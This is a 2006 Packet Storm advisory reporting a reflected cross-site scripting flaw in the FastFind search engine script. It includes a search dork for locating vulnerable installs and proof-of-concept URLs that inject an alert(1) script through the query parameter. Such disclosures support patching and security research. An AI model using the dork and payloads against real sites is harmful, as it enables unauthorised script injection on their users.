fastfind.txt

2006-10-12T00:00:00
ID PACKETSTORM:50859
Type packetstorm
Reporter Dr.Ninux
Modified 2006-10-12T00:00:00

Description

                                        
                                            `XSS IN FastFind...  
DORK:  
"Powered by FastFind - Search Engine Script"  
Exploit:  
http://[target]/[path]/index.php?query=<script>alert(1)</script>&type=simple  
references:  
http://www.interspire.com/fastfind/  
  
Example:  
http://www.target.com/fastfind/index.php?query=%3Cscript%3Ealert%281%29%3C%2Fscript%3E&type=simple  
http://www.target.com/search/index.php?query=<script>alert(1)</script>&type=simple  
`